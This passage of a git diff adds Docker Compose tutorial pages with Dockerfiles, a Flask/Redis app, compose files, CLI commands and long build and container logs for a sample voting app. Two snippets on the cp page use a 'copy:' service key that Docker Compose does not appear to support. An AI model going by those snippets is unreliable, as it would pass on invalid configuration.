Building 27.1s (15/15) FINISHED + => [internal] booting buildkit 0.5s + => => starting container buildx_buildkit_great_brahmagupta0 0.5s + => [internal] load build definition from Dockerfile 0.0s + => => transferring dockerfile: 319B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => resolve image config for docker.io/docker/dockerfile:1 3.8s + => docker-image://docker.io/docker/dockerfile:1@sha256:39b85bbfa7536a5feceb7372a0817649ecb2724562a38360f4d6a77 3.1s + => => resolve docker.io/docker/dockerfile:1@sha256:39b85bbfa7536a5feceb7372a0817649ecb2724562a38360f4d6a7782a4 0.0s + => => sha256:9d0cd65540a143ce38aa0be7c5e9efeed30d3580d03667f107cd76354f2bee65 10.82MB / 10.82MB 3.0s + => => extracting sha256:9d0cd65540a143ce38aa0be7c5e9efeed30d3580d03667f107cd76354f2bee65 0.1s + => [internal] load metadata for docker.io/library/python:3.7-alpine 3.6s + => [1/6] FROM docker.io/library/python:3.7-alpine@sha256:c9c2d6f97a00b211def3818830883495417e3b1fd34783ce6135c 3.9s + => => resolve docker.io/library/python:3.7-alpine@sha256:c9c2d6f97a00b211def3818830883495417e3b1fd34783ce6135c 0.0s + => => sha256:57a125a213d772ab0750422ad92f1cc7d1d97e0b09ad4ed766d9cd50db8e2b50 2.88MB / 2.88MB 1.9s + => => sha256:2bd7dfc9c660f2a9be2e537fd8f7f3c289ea1ba335c957472bd9a51630c9b449 230B / 230B 0.6s + => => sha256:6b1178b7c6752e0d2eb293ee14286ec1f75d0f868d9826bcaba24fe33affea99 11.01MB / 11.01MB 3.0s + => => sha256:cdba2f6867522ee9d2e8dcc9b1ad3ec5bafe75da976a3e613ff26cbc98738b48 624.86kB / 624.86kB 3.5s + => => sha256:af6eaf76a39c2d3e7e0b8a0420486e3df33c4027d696c076a99a3d0ac09026af 3.26MB / 3.26MB 0.6s + => => extracting sha256:af6eaf76a39c2d3e7e0b8a0420486e3df33c4027d696c076a99a3d0ac09026af 0.1s + => => extracting sha256:cdba2f6867522ee9d2e8dcc9b1ad3ec5bafe75da976a3e613ff26cbc98738b48 0.1s + => => extracting sha256:6b1178b7c6752e0d2eb293ee14286ec1f75d0f868d9826bcaba24fe33affea99 0.2s + => => extracting sha256:2bd7dfc9c660f2a9be2e537fd8f7f3c289ea1ba335c957472bd9a51630c9b449 0.0s + => => extracting sha256:57a125a213d772ab0750422ad92f1cc7d1d97e0b09ad4ed766d9cd50db8e2b50 0.1s + => [internal] load build context 0.0s + => => transferring context: 1.08kB 0.0s + => [2/6] WORKDIR /code 0.1s + => [3/6] RUN apk add --no-cache gcc musl-dev linux-headers 3.1s + => [4/6] COPY requirements.txt requirements.txt 0.0s + => [5/6] RUN pip install -r requirements.txt 3.1s + => [6/6] COPY . . 0.0s + => exporting to docker image format 5.6s + => => exporting layers 3.4s + => => exporting manifest sha256:198e97700c3c0f4a28b481ceacda99d7dacf2c8f42c86f7f4ffd6e5094098322 0.0s + => => exporting config sha256:dba54b65e3daa61d0ce759dc20145718068c33daf2eaf908c03e03934024df88 0.0s + => => sending tarball 2.2s + => importing to docker 1.4s +➜ 7-DC-CLI git:(main) βœ— + + +``` \ No newline at end of file diff --git a/content/en/docker/a27.docker-compose-config 2.md b/content/en/docker/a27.docker-compose-config 2.md new file mode 100644 index 0000000..be89f44 --- /dev/null +++ b/content/en/docker/a27.docker-compose-config 2.md @@ -0,0 +1,103 @@ +--- +title: "Docker Compose CLI - Config Command" +description: " Parse, resolve and render compose file in canonical format " +slug: "Docker-Compose-CLI-Config-Command" +--- + + +#### create dockerfile with following content + + +```dockerfile +# syntax=docker/dockerfile:1 +FROM python:3.7-alpine +WORKDIR /code +ENV FLASK_APP=app.py +ENV FLASK_RUN_HOST=0.0.0.0 +RUN apk add --no-cache gcc musl-dev linux-headers +COPY requirements.txt requirements.txt +RUN pip install -r requirements.txt +EXPOSE 5000 +COPY . . +CMD ["flask", "run"] + +``` + +#### create app.py with following content + + +```python +import time + +import redis +from flask import Flask + +app = Flask(__name__) +cache = redis.Redis(host='redis', port=6379) + +def get_hit_count(): + retries = 5 + while True: + try: + return cache.incr('hits') + except redis.exceptions.ConnectionError as exc: + if retries == 0: + raise exc + retries -= 1 + time.sleep(0.5) + +@app.route('/') +def hello(): + count = get_hit_count() + return 'Hello World! I have been seen {} times.\n'.format(count) + + +``` + +#### create requirements.txt fil with following content + + +```sh +flask +redis + +``` + +#### create docker-compose.yml with following content + +```yml +version: "3.9" +services: + web: + build: . + ports: + - "8000:5000" + redis: + image: "redis:alpine" +``` + +### docker compose config + +```sh +7-DC-CLI git:(main) βœ— docker compose config +name: 7-dc-cli +services: + redis: + image: redis:alpine + networks: + default: null + web: + build: + context: /Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/7-DC-CLI + dockerfile: Dockerfile + networks: + default: null + ports: + - mode: ingress + target: 5000 + published: "8000" + protocol: tcp +networks: + default: + name: 7-dc-cli_default +``` \ No newline at end of file diff --git a/content/en/docker/a28.docker-compose-cp 2.md b/content/en/docker/a28.docker-compose-cp 2.md new file mode 100644 index 0000000..adc6ce2 --- /dev/null +++ b/content/en/docker/a28.docker-compose-cp 2.md @@ -0,0 +1,84 @@ +--- +title: "Docker Compose CLI - CP Command " +description: " Copy files/folders between a service container and the local filesystem " +slug: "Docker-Compose-CLI-CP-Command" +--- + +### Copy files/folders between a service container and the local filesystem + +```sh +# Syntax to Copy from Container to Docker Host +docker cp {options} CONTAINER:SRC_PATH DEST_PATH +# Syntax to Copy from Docker Host to Container +docker cp {options} SRC_PATH CONTAINER:DEST_PATH + +``` + +#### lets run ngnix container + +```yml +version: '3' +services: + web: + image: nginx:latest + +``` + +#### run docker compose up + +```sh +docker compose -f docker-compose-ngnix.yml up + +``` + +### check running container + +```sh +➜ dockerworkshop git:(main) βœ— docker ps +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +008940fdbed8 nginx:latest "/docker-entrypoint.…" 29 seconds ago Up 28 seconds 80/tcp 7-dc-cli-web-1 +``` + +### create index.html + +```sh + + Docker-Compose git:(main) βœ— cd 7-DC-CLI +➜ 7-DC-CLI git:(main) βœ— ls +Dockerfile app.py docker-compose-ngnix.yml docker-compose.yml index.html requirements.txt src +``` +### copy index.html + +```sh +$ docker-compose cp index.html web:/usr/share/nginx/html/ + +``` + + +``` +services: + web: + image: nginx + volumes: + - ./nginx.conf:/etc/nginx/nginx.conf + ports: + - "80:80" + command: nginx-debug -g 'daemon off;' + copy: + - ./index.html:/usr/share/nginx/html/index.html +``` + +``` +services: + web: + image: nginx + volumes: + - ./nginx.conf:/etc/nginx/nginx.conf + ports: + - "80:80" + command: nginx-debug -g 'daemon off;' + copy: + - ./index.html:/usr/share/nginx/html/index.html + - ./style.css:/usr/share/nginx/html/style.css + - ./images:/usr/share/nginx/html/images +``` diff --git a/content/en/docker/a29.docker-compose-create 2.md b/content/en/docker/a29.docker-compose-create 2.md new file mode 100644 index 0000000..b07cc96 --- /dev/null +++ b/content/en/docker/a29.docker-compose-create 2.md @@ -0,0 +1,41 @@ +--- +title: "Docker Compose CLI - Create Command " +description: " Creates containers for a service. " +slug: "Docker-Compose-CLI-Create-Command" +--- + + +### create docker-compose.yml with following content + +```yml +version: "3.9" +services: + web: + build: . + ports: + - "8000:5000" + redis: + image: "redis:alpine" + +``` + + +### Creates containers for a service. + +```sh +➜ 7-DC-CLI git:(main) βœ— docker compose create +[+] Running 7/7 + β Ώ redis Pulled 6.1s + β Ώ af6eaf76a39c Already exists 0.0s + β Ώ 5015c79ed515 Pull complete 0.9s + β Ώ 2ca28624189f Pull complete 1.0s + β Ώ 4691452befb1 Pull complete 1.6s + β Ώ 746fa87aff8c Pull complete 2.1s + β Ώ b8496ad2d107 Pull complete 2.2s +WARN[0006] Found orphan containers ([7-dc-cli-client-1]) for this project. If you removed or renamed this service in your compose file, you can run this command with the --remove-orphans flag to clean it up. +[+] Running 2/2 + β Ώ Container 7-dc-cli-redis-1 Created 0.1s + β Ώ Container 7-dc-cli-web-1 Recreated 0.1s +➜ 7-DC-CLI git:(main) βœ— + +``` \ No newline at end of file diff --git a/content/en/docker/a3.docker-images-filter 2.md b/content/en/docker/a3.docker-images-filter 2.md new file mode 100644 index 0000000..6333413 --- /dev/null +++ b/content/en/docker/a3.docker-images-filter 2.md @@ -0,0 +1,62 @@ +--- +title: "Docker Image Filtering" +slug: Docker-Image-Filtering +--- + +running `docker run alpine ` command would download the Alpine Linux image from Docker Hub and start a new container based on that image. You can then use the container to run commands or applications. When you exit the container, it will stop running. + +Alpine Linux is a lightweight Linux distribution that is commonly used in Docker containers due to its small size and security features. + +```sh +dockerworkshop git:(main) βœ— docker pull alpine:3.6 +docker pull alpine:3.7 +docker pull alpine:3.8 +docker pull alpine:3.9 +3.6: Pulling from library/alpine +e8f81692e76c: Pull complete +Digest: sha256:66790a2b79e1ea3e1dabac43990c54aca5d1ddf268d9a5a0285e4167c8b24475 +Status: Downloaded newer image for alpine:3.6 +docker.io/library/alpine:3.6 +3.7: Pulling from library/alpine +40223db5366f: Pull complete +Digest: sha256:8421d9a84432575381bfabd248f1eb56f3aa21d9d7cd2511583c68c9b7511d10 +Status: Downloaded newer image for alpine:3.7 +docker.io/library/alpine:3.7 +3.8: Pulling from library/alpine +788aef77d06b: Pull complete +Digest: sha256:2bb501e6173d9d006e56de5bce2720eb06396803300fe1687b58a7ff32bf4c14 +Status: Downloaded newer image for alpine:3.8 +docker.io/library/alpine:3.8 +3.9: Pulling from library/alpine +941f399634ec: Pull complete +Digest: sha256:414e0518bb9228d35e4cd5165567fb91d26c6a214e9c95899e1e056fcd349011 +Status: Downloaded newer image for alpine:3.9 +docker.io/library/alpine:3.9 + +``` + +#### docker images filtering + +The docker images command allows you to filter Docker images based on various criteria using the --filter option. Here are some common filters that you can use with the docker images command: + + +```sh +docker images --filter=reference='alpine' +REPOSITORY TAG IMAGE ID CREATED SIZE +alpine 3.9 9afdd4a290bf 2 years ago 5.3MB +alpine 3.8 b22edbe95d11 3 years ago 4.2MB +alpine 3.7 bd812700d284 3 years ago 4.01MB +alpine 3.6 25e814211fdd 3 years ago 3.84MB +``` +#### Filters images that are or are not "dangling," meaning they are not tagged and not referenced by any container. + +```sh +docker images --filter dangling=false +``` +Or to list images created before a specific image, you can run: + +```sh +docker images --filter before=alpine:3.8 + +``` + diff --git a/content/en/docker/a30.docker-compose-down 2.md b/content/en/docker/a30.docker-compose-down 2.md new file mode 100644 index 0000000..acea744 --- /dev/null +++ b/content/en/docker/a30.docker-compose-down 2.md @@ -0,0 +1,60 @@ +--- +title: "Docker Compose CLI - Down Command " +description: " Stop and remove containers, networks " +slug: "Docker-Compose-CLI-Down-Command" +--- + + + +### create docker-compose.yml with following content + +```yml +version: "3.9" +services: + web: + build: . + ports: + - "8000:5000" + redis: + image: "redis:alpine" + +``` + + +### Create docker compose up + +```sh + + docker compose up +WARN[0000] Found orphan containers ([7-dc-cli-client-1]) for this project. If you removed or renamed this service in your compose file, you can run this command with the --remove-orphans flag to clean it up. +Attaching to 7-dc-cli-redis-1, 7-dc-cli-web-1 +7-dc-cli-redis-1 | 1:C 04 Mar 2023 14:23:46.156 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo +7-dc-cli-redis-1 | 1:C 04 Mar 2023 14:23:46.156 # Redis version=7.0.9, bits=64, commit=00000000, modified=0, pid=1, just started +7-dc-cli-redis-1 | 1:C 04 Mar 2023 14:23:46.156 # Warning: no config file specified, using the default config. In order to specify a config file use redis-server /path/to/redis.conf +7-dc-cli-redis-1 | 1:M 04 Mar 2023 14:23:46.157 * monotonic clock: POSIX clock_gettime +7-dc-cli-redis-1 | 1:M 04 Mar 2023 14:23:46.158 * Running mode=standalone, port=6379. +7-dc-cli-redis-1 | 1:M 04 Mar 2023 14:23:46.158 # Server initialized +7-dc-cli-redis-1 | 1:M 04 Mar 2023 14:23:46.160 * Ready to accept connections +7-dc-cli-web-1 | * Serving Flask app 'app.py' +7-dc-cli-web-1 | * Debug mode: off +7-dc-cli-web-1 | WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead. +7-dc-cli-web-1 | * Running on all addresses (0.0.0.0) +7-dc-cli-web-1 | * Running on http://127.0.0.1:5000 +7-dc-cli-web-1 | * Running on http://172.18.0.3:5000 +7-dc-cli-web-1 | Press CTRL+C to quit + + +``` + +### Create docker compose Down + +```sh + 7-DC-CLI git:(main) βœ— docker compose down +[+] Running 3/3 + β Ώ Container 7-dc-cli-redis-1 Removed 0.2s + β Ώ Container 7-dc-cli-web-1 Removed 10.2s + β Ώ Network 7-dc-cli_default Removed 0.1s +➜ 7-DC-CLI git:(main) βœ— + + +``` \ No newline at end of file diff --git a/content/en/docker/a31.docker-compose-events 2.md b/content/en/docker/a31.docker-compose-events 2.md new file mode 100644 index 0000000..ff64c00 --- /dev/null +++ b/content/en/docker/a31.docker-compose-events 2.md @@ -0,0 +1,366 @@ +--- +title: "Docker Compose CLI - Events Command " +description: " Receive real time events from containers. " +slug: "Docker-Compose-CLI-Events-Command" +--- + + +#### here is sample voting app + +```sh +cat docker-compose.yml +# version is now using "compose spec" +# v2 and v3 are now combined! +# docker-compose v1.27+ required + +services: + vote: + build: ./vote + # use python rather than gunicorn for local dev + command: python app.py + depends_on: + redis: + condition: service_healthy + healthcheck: + test: ["CMD", "curl", "-f", "http://localhost"] + interval: 15s + timeout: 5s + retries: 3 + start_period: 10s + volumes: + - ./vote:/app + ports: + - "5000:80" + networks: + - front-tier + - back-tier + + result: + build: ./result + # use nodemon rather than node for local dev + entrypoint: nodemon server.js + depends_on: + db: + condition: service_healthy + volumes: + - ./result:/app + ports: + - "5001:80" + - "5858:5858" + networks: + - front-tier + - back-tier + + worker: + build: + context: ./worker + depends_on: + redis: + condition: service_healthy + db: + condition: service_healthy + networks: + - back-tier + + redis: + image: redis:alpine + volumes: + - "./healthchecks:/healthchecks" + healthcheck: + test: /healthchecks/redis.sh + interval: "5s" + networks: + - back-tier + + db: + image: postgres:15-alpine + environment: + POSTGRES_USER: "postgres" + POSTGRES_PASSWORD: "postgres" + volumes: + - "db-data:/var/lib/postgresql/data" + - "./healthchecks:/healthchecks" + healthcheck: + test: /healthchecks/postgres.sh + interval: "5s" + networks: + - back-tier + + # this service runs once to seed the database with votes + # it won't run unless you specify the "seed" profile + # docker compose --profile seed up -d + seed: + build: ./seed-data + profiles: ["seed"] + depends_on: + vote: + condition: service_healthy + networks: + - front-tier + restart: "no" + +volumes: + db-data: + +networks: + front-tier: + back-tier: + + + + +``` + + +#### Docker Compose up + +```sh +example-voting-app git:(main) docker compose up +[+] Running 9/9 + β Ώ db Pulled 9.7s + β Ώ af6eaf76a39c Already exists 0.0s + β Ώ 71286d2ce0cc Pull complete 1.7s + β Ώ b82afe47906a Pull complete 1.8s + β Ώ 75d514bb4aa7 Pull complete 5.6s + β Ώ 217da6f41d9e Pull complete 5.7s + β Ώ 39a3f4823126 Pull complete 5.7s + β Ώ ed6571a6afcc Pull complete 5.8s + β Ώ 8ae7d38f54c4 Pull complete 5.8s +[+] Building 36.2s (42/42) FINISHED + => [example-voting-app-result internal] load .dockerignore 0.0s + => => transferring context: 54B 0.0s + => [example-voting-app-result internal] load build definition from Dockerfile 0.0s + => => transferring dockerfile: 517B 0.0s + => [example-voting-app-result internal] load metadata for docker.io/library/node:18-slim 5.1s + => [example-voting-app-vote internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [example-voting-app-vote internal] load build definition from Dockerfile 0.0s + => => transferring dockerfile: 740B 0.0s + => [example-voting-app-vote internal] load metadata for docker.io/library/python:3.9-slim 5.2s + => [example-voting-app-worker internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [example-voting-app-worker internal] load build definition from Dockerfile 0.0s + => => transferring dockerfile: 1.45kB 0.0s + => [example-voting-app-worker internal] load metadata for mcr.microsoft.com/dotnet/runtime:7.0 1.4s + => [example-voting-app-worker internal] load metadata for mcr.microsoft.com/dotnet/sdk:7.0 1.3s + => [example-voting-app-worker build 1/7] FROM mcr.microsoft.com/dotnet/sdk:7.0@sha256:bd1ccc2332fc03c6df1659ed125f67f02666f9f188947a80cec4e7afd3c7f98d 18.5s + => => resolve mcr.microsoft.com/dotnet/sdk:7.0@sha256:bd1ccc2332fc03c6df1659ed125f67f02666f9f188947a80cec4e7afd3c7f98d 0.0s + => => sha256:8907849f91e57df0899482d802a3fc140b67a6d5febaa503837ed2233d662283 13.55MB / 13.55MB 4.5s + => => sha256:afd8a1df3eb1e6747064359ca9bc37db5330672279e0be935849f256d4b3f0b1 155.94MB / 155.94MB 12.4s + => => sha256:e4f0af37a4eb47b3e26810a4721ebdf36d9342d580d8c6027bd99a7596acc98c 25.39MB / 25.39MB 1.9s + => => sha256:d1a2ad48fbf7e8af456454a11f1e058cdb9ba171ef35dace5d13b495b053cc84 9.80MB / 9.80MB 1.1s + => => extracting sha256:d1a2ad48fbf7e8af456454a11f1e058cdb9ba171ef35dace5d13b495b053cc84 0.1s + => => extracting sha256:e4f0af37a4eb47b3e26810a4721ebdf36d9342d580d8c6027bd99a7596acc98c 0.5s + => => extracting sha256:afd8a1df3eb1e6747064359ca9bc37db5330672279e0be935849f256d4b3f0b1 4.0s + => => extracting sha256:8907849f91e57df0899482d802a3fc140b67a6d5febaa503837ed2233d662283 0.4s + => [example-voting-app-worker internal] load build context 0.0s + => => transferring context: 7.48kB 0.0s + => [example-voting-app-worker stage-1 1/3] FROM mcr.microsoft.com/dotnet/runtime:7.0@sha256:1ed4d59643e6b8b41b64ffa00b524ebca9de287bd3efa9955f9fa706f1dd0471 3.6s + => => resolve mcr.microsoft.com/dotnet/runtime:7.0@sha256:1ed4d59643e6b8b41b64ffa00b524ebca9de287bd3efa9955f9fa706f1dd0471 0.0s + => => sha256:a34d8d2343cd4d1705a15b9494ef9b39d01832d43c3a09fe129458c8bfdabeee 155B / 155B 0.2s + => => sha256:b7dfc290d72d9065e3276dcd05c3323942f8947a71dd5e7b4304f7a68d25c9c9 30.71MB / 30.71MB 3.1s + => => sha256:235af35749f09d6549b76fb376b3929ec21198feee4e72ffb396514dd11b374e 14.92MB / 14.92MB 1.8s + => => sha256:66dbba0fb1b568cc3ffd53409ba2f9f82995ab7f80e379338f3f36e4dcd223be 30.06MB / 30.06MB 2.2s + => => extracting sha256:66dbba0fb1b568cc3ffd53409ba2f9f82995ab7f80e379338f3f36e4dcd223be 0.6s + => => extracting sha256:235af35749f09d6549b76fb376b3929ec21198feee4e72ffb396514dd11b374e 0.2s + => => extracting sha256:b7dfc290d72d9065e3276dcd05c3323942f8947a71dd5e7b4304f7a68d25c9c9 0.5s + => => extracting sha256:a34d8d2343cd4d1705a15b9494ef9b39d01832d43c3a09fe129458c8bfdabeee 0.0s + => [example-voting-app-result 1/7] FROM docker.io/library/node:18-slim@sha256:36f3403a001b82d525afd2bdb7fcec0980543277dd86e9657964cce3438ae4b7 4.1s + => => resolve docker.io/library/node:18-slim@sha256:36f3403a001b82d525afd2bdb7fcec0980543277dd86e9657964cce3438ae4b7 0.0s + => => sha256:8e5162ad1efe24f915933435516b8cb1510cc80704bdf87c868e995f4f871cd9 451B / 451B 0.4s + => => sha256:1ad5fb92392ab64732e756b44967f7ecead775eb06ce3f9cd43d1a22bd9c9458 2.77MB / 2.77MB 1.8s + => => sha256:cc36a0fa43f85245c8d9977661c82a89cfc226fc26e5861670cf62c0933f62c4 46.14MB / 46.14MB 2.9s + => => sha256:d1d4cdb9c955626876afec2a95c6f7487481e067acc0a8be1867f678003266df 4.19kB / 4.19kB 0.6s + => => extracting sha256:d1d4cdb9c955626876afec2a95c6f7487481e067acc0a8be1867f678003266df 0.0s + => => extracting sha256:cc36a0fa43f85245c8d9977661c82a89cfc226fc26e5861670cf62c0933f62c4 1.0s + => => extracting sha256:1ad5fb92392ab64732e756b44967f7ecead775eb06ce3f9cd43d1a22bd9c9458 0.1s + => => extracting sha256:8e5162ad1efe24f915933435516b8cb1510cc80704bdf87c868e995f4f871cd9 0.0s + => [example-voting-app-result internal] load build context 0.0s + => => transferring context: 302.01kB 0.0s + => [example-voting-app-worker stage-1 2/3] WORKDIR /app 0.2s + => [example-voting-app-vote 1/6] FROM docker.io/library/python:3.9-slim@sha256:2ed9cf48cf86eb638a9ceb555737161fbb20fa0474494269150b4d6c2653227b 2.7s + => => resolve docker.io/library/python:3.9-slim@sha256:2ed9cf48cf86eb638a9ceb555737161fbb20fa0474494269150b4d6c2653227b 0.0s + => => sha256:98b352a9715d74c4172491762aded5e741a28ce83df0fd99321a1031b1d5b6c8 3.17MB / 3.17MB 0.6s + => => sha256:14b89f7d65aecdc5e63ab5759d5135ec777524bcdbc4adb5200fac65c825655d 233B / 233B 0.3s + => => sha256:ac439b0377b530ec2bd538701b6611c91588fdf491f0566458373c314866cfb8 11.22MB / 11.22MB 0.9s + => => sha256:1f3ba05aa6dc6bcf7f4f57d5eaec80fd3edffbffde2e9727df29d63c978f0b99 1.06MB / 1.06MB 1.4s + => => extracting sha256:1f3ba05aa6dc6bcf7f4f57d5eaec80fd3edffbffde2e9727df29d63c978f0b99 0.0s + => => extracting sha256:ac439b0377b530ec2bd538701b6611c91588fdf491f0566458373c314866cfb8 0.2s + => => extracting sha256:14b89f7d65aecdc5e63ab5759d5135ec777524bcdbc4adb5200fac65c825655d 0.0s + => => extracting sha256:98b352a9715d74c4172491762aded5e741a28ce83df0fd99321a1031b1d5b6c8 0.1s + => [example-voting-app-vote internal] load build context 0.0s + => => transferring context: 6.11kB 0.0s + => [example-voting-app-vote 2/6] RUN apt-get update && apt-get install -y --no-install-recommends curl && rm -rf /var/lib/apt/lists/* 4.2s + => [example-voting-app-result 2/7] RUN apt-get update && apt-get install -y --no-install-recommends curl tini && rm -rf /var/lib/apt/lists/* 3.4s + => [example-voting-app-vote 3/6] WORKDIR /app 0.0s + => [example-voting-app-vote 4/6] COPY requirements.txt /app/requirements.txt 0.0s + => [example-voting-app-vote 5/6] RUN pip install -r requirements.txt 3.0s + => [example-voting-app-result 3/7] WORKDIR /app 0.0s + => [example-voting-app-result 4/7] RUN npm install -g nodemon 1.9s + => [example-voting-app-result 5/7] COPY package*.json ./ 0.0s + => [example-voting-app-result 6/7] RUN npm ci && npm cache clean --force && mv /app/node_modules /node_modules 2.1s + => [example-voting-app-vote 6/6] COPY . . 0.0s + => [example-voting-app-vote] exporting to docker image format 3.8s + => => exporting layers 0.5s + => => exporting manifest sha256:8e6e3010a750bd01eebd409fa77a5e98f99f4aecefe6de2b8eb43096e7de9bcb 0.0s + => => exporting config sha256:5c1cf62b540c59ce0a99930302aae92523c6db3e77d0e8737d4d4260908880ee 0.0s + => => sending tarball 3.2s + => importing to docker 2.4s + => [example-voting-app-result 7/7] COPY . . 0.0s + => [example-voting-app-result] exporting to docker image format 3.9s + => => exporting layers 0.3s + => => exporting manifest sha256:91ac5a4bcc08913d88936fca0f6f36a58a69cb0e2de202691b3fe6c545d21e7c 0.0s + => => exporting config sha256:223b94fc00aee779a4ee25ce9d1c69cab293aedd539b843faba7c1a47e894b29 0.0s + => => sending tarball 3.6s + => importing to docker 2.4s + => [example-voting-app-worker build 2/7] RUN echo "I am running on linux/arm64, building for linux/arm64" 0.1s + => [example-voting-app-worker build 3/7] WORKDIR /source 0.0s + => [example-voting-app-worker build 4/7] COPY *.csproj . 0.0s + => [example-voting-app-worker build 5/7] RUN case linux/arm64 in "linux/amd64") ARCH=x64 ;; "linux/arm64") ARCH=arm64 ;; "linux/arm64/v8") ARCH=a 12.3s + => [example-voting-app-worker build 6/7] COPY . . 0.0s + => [example-voting-app-worker build 7/7] RUN case linux/arm64 in "linux/amd64") ARCH=x64 ;; "linux/arm64") ARCH=arm64 ;; "linux/arm64/v8") ARCH=a 1.7s + => [example-voting-app-worker stage-1 3/3] COPY --from=build /app . 0.0s + => [example-voting-app-worker] exporting to docker image format 1.8s + => => exporting layers 0.1s + => => exporting manifest sha256:93ec3cbb0ef4e82b397475cf25ca330aef2b4b2badaa7ad86541b00e48305e63 0.0s + => => exporting config sha256:8f82fda1dae8bc1c7c040c0c3045239fd48547d34ee3d5d458683cef7b107188 0.0s + => => sending tarball 1.7s + => importing to docker 0.7s +[+] Running 8/5 + β Ώ Network example-voting-app_back-tier Created 0.1s + β Ώ Network example-voting-app_front-tier Created 0.1s + β Ώ Volume "example-voting-app_db-data" Created 0.0s + β Ώ Container example-voting-app-redis-1 Created 0.2s + β Ώ Container example-voting-app-db-1 Created 0.2s + β Ώ Container example-voting-app-vote-1 Created 0.0s + β Ώ Container example-voting-app-worker-1 Created 0.0s + β Ώ Container example-voting-app-result-1 Created 0.0s +Attaching to example-voting-app-db-1, example-voting-app-redis-1, example-voting-app-result-1, example-voting-app-vote-1, example-voting-app-worker-1 +example-voting-app-redis-1 | 1:C 04 Mar 2023 14:41:27.311 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo +example-voting-app-redis-1 | 1:C 04 Mar 2023 14:41:27.313 # Redis version=7.0.9, bits=64, commit=00000000, modified=0, pid=1, just started +example-voting-app-redis-1 | 1:C 04 Mar 2023 14:41:27.313 # Warning: no config file specified, using the default config. In order to specify a config file use redis-server /path/to/redis.conf +example-voting-app-redis-1 | 1:M 04 Mar 2023 14:41:27.313 * monotonic clock: POSIX clock_gettime +example-voting-app-redis-1 | 1:M 04 Mar 2023 14:41:27.314 * Running mode=standalone, port=6379. +example-voting-app-redis-1 | 1:M 04 Mar 2023 14:41:27.315 # Server initialized +example-voting-app-redis-1 | 1:M 04 Mar 2023 14:41:27.318 * Ready to accept connections +example-voting-app-db-1 | The files belonging to this database system will be owned by user "postgres". +example-voting-app-db-1 | This user must also own the server process. +example-voting-app-db-1 | +example-voting-app-db-1 | The database cluster will be initialized with locale "en_US.utf8". +example-voting-app-db-1 | The default database encoding has accordingly been set to "UTF8". +example-voting-app-db-1 | The default text search configuration will be set to "english". +example-voting-app-db-1 | +example-voting-app-db-1 | Data page checksums are disabled. +example-voting-app-db-1 | +example-voting-app-db-1 | fixing permissions on existing directory /var/lib/postgresql/data ... ok +example-voting-app-db-1 | creating subdirectories ... ok +example-voting-app-db-1 | selecting dynamic shared memory implementation ... posix +example-voting-app-db-1 | selecting default max_connections ... 100 +example-voting-app-db-1 | selecting default shared_buffers ... 128MB +example-voting-app-db-1 | selecting default time zone ... UTC +example-voting-app-db-1 | creating configuration files ... ok +example-voting-app-db-1 | running bootstrap script ... ok +example-voting-app-db-1 | sh: locale: not found +example-voting-app-db-1 | 2023-03-04 14:41:27.703 UTC [30] WARNING: no usable system locales were found +example-voting-app-db-1 | performing post-bootstrap initialization ... ok +example-voting-app-db-1 | initdb: warning: enabling "trust" authentication for local connections +example-voting-app-db-1 | initdb: hint: You can change this by editing pg_hba.conf or using the option -A, or --auth-local and --auth-host, the next time you run initdb. +example-voting-app-db-1 | syncing data to disk ... ok +example-voting-app-db-1 | +example-voting-app-db-1 | +example-voting-app-db-1 | Success. You can now start the database server using: +example-voting-app-db-1 | +example-voting-app-db-1 | pg_ctl -D /var/lib/postgresql/data -l logfile start +example-voting-app-db-1 | +example-voting-app-db-1 | waiting for server to start....2023-03-04 14:41:28.118 UTC [36] LOG: starting PostgreSQL 15.2 on aarch64-unknown-linux-musl, compiled by gcc (Alpine 12.2.1_git20220924-r4) 12.2.1 20220924, 64-bit +example-voting-app-db-1 | 2023-03-04 14:41:28.120 UTC [36] LOG: listening on Unix socket "/var/run/postgresql/.s.PGSQL.5432" +example-voting-app-db-1 | 2023-03-04 14:41:28.124 UTC [39] LOG: database system was shut down at 2023-03-04 14:41:28 UTC +example-voting-app-db-1 | 2023-03-04 14:41:28.127 UTC [36] LOG: database system is ready to accept connections +example-voting-app-db-1 | done +example-voting-app-db-1 | server started +example-voting-app-db-1 | +example-voting-app-db-1 | /usr/local/bin/docker-entrypoint.sh: ignoring /docker-entrypoint-initdb.d/* +example-voting-app-db-1 | +example-voting-app-db-1 | waiting for server to shut down....2023-03-04 14:41:28.218 UTC [36] LOG: received fast shutdown request +example-voting-app-db-1 | 2023-03-04 14:41:28.220 UTC [36] LOG: aborting any active transactions +example-voting-app-db-1 | 2023-03-04 14:41:28.222 UTC [36] LOG: background worker "logical replication launcher" (PID 42) exited with exit code 1 +example-voting-app-db-1 | 2023-03-04 14:41:28.222 UTC [37] LOG: shutting down +example-voting-app-db-1 | 2023-03-04 14:41:28.222 UTC [37] LOG: checkpoint starting: shutdown immediate +example-voting-app-db-1 | 2023-03-04 14:41:28.227 UTC [37] LOG: checkpoint complete: wrote 3 buffers (0.0%); 0 WAL file(s) added, 0 removed, 0 recycled; write=0.002 s, sync=0.001 s, total=0.005 s; sync files=2, longest=0.001 s, average=0.001 s; distance=0 kB, estimate=0 kB +example-voting-app-db-1 | 2023-03-04 14:41:28.233 UTC [36] LOG: database system is shut down +example-voting-app-db-1 | done +example-voting-app-db-1 | server stopped +example-voting-app-db-1 | +example-voting-app-db-1 | PostgreSQL init process complete; ready for start up. +example-voting-app-db-1 | +example-voting-app-db-1 | 2023-03-04 14:41:28.342 UTC [1] LOG: starting PostgreSQL 15.2 on aarch64-unknown-linux-musl, compiled by gcc (Alpine 12.2.1_git20220924-r4) 12.2.1 20220924, 64-bit +example-voting-app-db-1 | 2023-03-04 14:41:28.342 UTC [1] LOG: listening on IPv4 address "0.0.0.0", port 5432 +example-voting-app-db-1 | 2023-03-04 14:41:28.342 UTC [1] LOG: listening on IPv6 address "::", port 5432 +example-voting-app-db-1 | 2023-03-04 14:41:28.344 UTC [1] LOG: listening on Unix socket "/var/run/postgresql/.s.PGSQL.5432" +example-voting-app-db-1 | 2023-03-04 14:41:28.347 